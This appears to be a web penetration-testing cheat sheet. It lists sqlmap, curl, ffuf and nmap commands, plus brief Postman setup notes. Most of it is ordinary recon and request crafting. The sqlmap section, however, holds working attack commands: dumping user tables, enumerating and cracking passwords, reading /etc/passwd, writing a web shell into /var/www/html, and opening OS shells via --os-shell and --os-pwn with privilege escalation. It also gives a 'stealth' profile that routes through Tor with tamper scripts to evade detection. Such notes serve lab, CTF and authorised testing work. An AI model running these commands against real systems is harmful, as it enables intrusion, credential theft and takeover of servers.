sqlmap and ZAP auth/cookie integration
Open ZAP and login in to target application
Visit request that contains authenticated cookie
Copy the cookie value in the request tab
Run sqlmap command with cookie and proxy included
Example uses for the field:
Proxy sqlmap through ZAP with custom user agent "bughunter"
sqlmap -u "https://website.com/vulnerablepage/?id=1&Submit=Submit" --cookie="currentZAPcookie" --proxy --batch --user-agent bughunter
Searching for the word "pass"
sqlmap -u "https://website.com/vulnerablepage/?id=1&Submit=Submit" --cookie="currentZAPcookie" --proxy -D db_name --search -C pass --batch
curl -s -O website.com/index.html
curl -k https://website.com
Skip HTTPS (SSL) certificate validation
Print full HTTP request/response details
curl -I https://www.website.com
Send HEAD request (only prints response headers)
curl -i https://www.website.com
Print response headers and response body
curl https://www.website.com -A 'Mozilla/5.0'
curl -u admin:admin http://<SERVER_IP>:<PORT>/
Set HTTP basic authorization credentials
curl http://admin:admin@<SERVER_IP>:<PORT>/
Pass HTTP basic authorization credentials in the URL
curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://<SERVER_IP>:<PORT>/
curl 'http://<SERVER_IP>:<PORT>/search.php?search=le'
curl -X POST -d 'username=admin&password=admin' http://<SERVER_IP>:<PORT>/
Send POST request with POST data
curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<SERVER_IP>:<PORT>/
curl -X POST -d '{"search":"london"}' -H 'Content-Type: application/json' http://<SERVER_IP>:<PORT>/search.php
Send POST request with JSON data
curl -s https://sonar.omnisint.io/subdomains/{domain} | jq -r '.[]' | sort -u
All subdomains for a given domain.
curl -s https://sonar.omnisint.io/tlds/{domain} | jq -r '.[]' | sort -u
All TLDs found for a given domain.
curl -s https://sonar.omnisint.io/all/{domain} | jq -r '.[]' | sort -u
All results across all TLDs for a given domain.
curl -s https://sonar.omnisint.io/reverse/{ip} | jq -r '.[]' | sort -u
Reverse DNS lookup on IP address.
curl -s https://sonar.omnisint.io/reverse/{ip}/{mask} | jq -r '.[]' | sort -u
Reverse DNS lookup of a CIDR range.
curl -s "https://crt.sh/?q=${TARGET}&output=json" | jq -r '.[] | "\(.name_value)\n\(.common_name)"' | sort -u
Certificate Transparency.
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.website.com/
ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.website.com' -fs xxx
ffuf -w wordlist.txt:FUZZ -u http://admin.website.com:PORT/admin/admin.php?FUZZ=key -fs xxx
ffuf -w wordlist.txt:FUZZ -u http://admin.website.com:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
ffuf -w ids.txt:FUZZ -u http://admin.website.com:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
ffuf -w ./vhosts -u http:// -H "HOST: FUZZ.target.domain" -fs 612
Bruteforcing for possible virtual hosts on the target domain using ffuf.
ffuf -recursion -recursion-depth 1 -u -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
Discovering files and folders that cannot be spotted by browsing the website.
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://www.target.domain/FOLDERS/WORDLISTEXTENSIONS
Scan a port with Nmap via proxy with the -Pn
flag to skip host discovery and scripts
nmap --proxies SERVER_IP -pPORT -Pn -sC
View the advanced help menu
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch
Run SQLMap
without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test'
sqlmap -u 'https://site.com' --data '{"User":"abcdefg","Pwd":"Abc@123"}' --random-agent --ignore-code=403 --dbs --hex
SQLMap POST with JSON data
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'
POST request specifying an injection point with an asterisk
Passing an HTTP request file to SQLMap
sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'
Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUT
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt
Store traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"
Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5
Specifying the level and risk
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"
sqlmap -u "http://www.example.com/?id=1" --schema
Database schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T user
sqlmap -u "http://www.example.com/?id=1" --passwords --batch
Password enumeration and cracking
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
sqlmap -u "http://www.example.com/?id=1" --os-shell
Additional SQLmap uses
CTF (fast, but it's noisy)
sqlmap --random-agent -u <ADD_TARGET_REPLACE_THIS> --crawl 10 --all --level=5 --risk=3 -f --beep --output-dir=. -o --no-cast --batch --check-internet --tamper=space2comment,randomcase,between
Stealth (stealthy, but slow at the same time)
sqlmap --random-agent --crawl=10 -u <ADD_TARGET_REPLACE_THIS> --tor --check-tor --all --level=5 --risk=2 -f --beep --force-ssl --output-dir=. -o --tamper=space2comment,randomcase,between --no-cast --batch --check-internet --force-ssl
stealth + OS access (same as above, but this can attempt to access the OS with metasploit if an exploit is found)
sqlmap --random-agent -u <ADD_TARGET_REPLACE_THIS> --tor --check-tor --all --os-pwn --msf-path=/opt/metasploit-framework/ --priv-esc --level=5 --risk=2 -f --beep --force-ssl --output-dir=. -o --tamper=space2comment --no-cast --batch --check-internet
Set manual upstream proxy (Burp/ZAP)
Save first successful request as new collection
Highlight base URL and right-click "set as variable" and select collection scope
Set other common URLs for testing as different variables
Verify new variables by hovering over Collection>"more actions" dropdown menu> Variables tab
Query Parameters
Name and Save new request to corresponding collection
(Optional) Modify key and value pair {{baseURL}}?key=value
Path Variables